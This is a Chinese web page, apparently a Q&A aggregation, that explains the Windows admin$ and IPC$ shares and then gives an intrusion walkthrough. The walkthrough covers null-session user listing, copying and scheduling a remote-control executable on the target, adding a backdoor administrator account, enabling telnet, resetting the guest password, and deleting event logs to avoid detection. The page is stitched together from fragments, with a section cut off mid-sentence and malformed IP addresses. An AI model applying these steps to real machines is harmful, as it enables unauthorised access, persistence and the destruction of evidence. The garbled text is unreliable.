什么是admin$它与IPC有什么区别

有些是个人观点，如果有错误的地方请指出：

一、IPC（Internet Process Connection）互联网进程间通过开放“命名管道”来通信的一种机制。作用是为了让互联网中的计算机进程之间进行通信而开放的，通过验证用户名和密码获得相应权限，从而双方可以建立安全的“命名管道”，并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

举例：比如远程计算机的IP为1921681100，在知道对方用户名和密码的情况下，并且开启IPC$，就可以与它进行连接，然后获得相应权限。

使用命令：net use \\1921681100\ipc$ 123 /user:administrator

1可以查看远程主机的共享资源：net view \\1921681100

2查看远程主机的当前时间：net time \\1921681100

3得到远程主机的NetBIOS用户名列表：nbtstat -A 1921681100

二、IPC$是共享“命名管道”的资源（网上是这么解释的），就是互联网进程间通过开放“命名管道”来通信的共享资源，我的理解是：“普通共享”（C、D、E），是一种实实在在存在的共享的资源，而IPC$是“系统默认共享”（隐藏共享）的统称，也是实实在在存在的。

三、就像上面讲的，IPC$是系统默认共享的统称，Admin$是系统默认共享的一种，叫系统目录共享。默认共享包括：所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。

一、对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令： 1 首先，我们先建立一个空会话（需要目标开放ipc$） 命令：net use \\ip\ipc$ "" /user:"" 注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。 2 查看远程主机的共享资源 命令：net view \\IP 解释：建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果： 在 \\的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令：net time \\IP 解释：用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT） nbtstat -A IP 用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果： Node IpAddress: [] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered __MSBROWSE__<01> GROUP Registered INet~Services <1C> GROUP Registered IS~SERVER<00> UNIQUE Registered MAC Address = 00-50-8B-9A-2D-37 以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的作会在EventLog中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？ 五 ipc$所使用的端口 首先我们来了解一些基础知识： 1 SMBServer Message Block) Windows协议族，用于文件打印共享的服务； 2 NBTNETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。 3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。 有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了： 对

先说下耐心看～！！

命令:net use \\ip\ipc$ 密码 /user:用户

比如：net use \\22016019938\ipc$ "" /user:"zyz"

显示成功后

可以上传一个东西

命令:copy 本地文件 远程目录

如:copy c:\4899exe \\1921680200\admin$

(这里的$是指admin用户的c:\winnt\system32\)

传过去了,我们当然要运行它啊,怎么运行呢接着看

现在我们来看看他机器的时间

命令:net time \\1921680200

然后用这个命令启动

at \\1921680200 时间 要运行的文件

at \\IP 时间 要运行的文件

(这个是计划任务里边的一个命令)

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功，那么我们可以把他加入Administrator组了

net localgroup Administrators heibai /add

射对方的C盘，当然其他盘也可以，只要存在就行了我们这里把对方的C盘映射到本地的Z盘

net use z:\\127001\c$

net start telnet

这样可以打开对方的TELNET服务

再说下把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net user guest lovechina

最重要的是删除共享了～不然多乱啊～

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

当然还有扫尾巴（如果你想被抓的话从此略过呵呵～）

命令语法：

Cscript cleanlogvbe IP username pass system –all //删除系统日志

Cscript cleanlogvbe IP username pass application –all //删除应用程序日志

Cscript cleanlogvbe IP username pass secutity –all //删除安全日志

使用的优势：无须对方开启ipc$共享

IPC$是共享"命名管道"的资源利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use /del 删除全部,会有提示要求按y确认五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上 *** 作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了

以上就是关于什么是admin$它与IPC有什么区别全部的内容，包括:什么是admin$它与IPC有什么区别、WindowsXP 怎么使用 IPC$、急！在局域网内有一台pc可以建立ipc$且只有一个共享，我用copy复制本地文件至pc共享上却提示权限不足！等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！